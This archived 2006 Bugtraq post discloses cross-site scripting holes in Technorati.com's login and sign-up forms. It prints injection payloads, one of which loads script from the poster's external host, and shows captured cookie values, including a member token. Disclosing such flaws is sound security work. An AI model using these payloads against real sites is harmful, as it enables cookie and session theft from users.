| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 14 Jun 2006 08:52:30 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Technorati.com - XSS with cookie disclosure Technorati.com Homepage: http://www.technorati.com Affected files: login box Creating a new account input boxes Login box XSS vuln: By escaping quotes and using script tags, we can acomplish our XSS example. For PoC try putting the following code in the login box: ">">">">'>'>'>"><"">">"><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<"<"<"<'<' Screenshots: http://www.youducktard.com/xsp/technorati1.jpg Our cookie data: This is remote text via xss.js located at youfucktard.com tvisitor=34.127.0.22.1150259450857579; TECHNORATI_MEMBER=4d5bd72bf6b2e71e5be9fa8dc3d99d7b ------------------------------------------------ Creatinga new profile input boxes: We use the same method as above, and since the "Emailaddress" box allows more characters then the others ( <"">">'>'><IMG SRC=javascript:alert('XSS')><"<"<'<'<"><" Spoofing forms to create XSS: Now, the forms to create a new account can also be spoofed, the only data that seemsto be checked are illegal characters in usernames and email addresses. Below are three screenshots of spoofing the create account form, the XSS example that results in it, and the technorati.com page loading normally after. Screenshots: http://www.youfucktard.com/xsp/technorati3.jpg http://www.youfucktard.com/xsp/technorati4.jpg http://www.youfucktard.com/xsp/technorati5.jpg Technorati profile: http://www.technorati.com/profile/bonerbee
Powered by blists - more mailing lists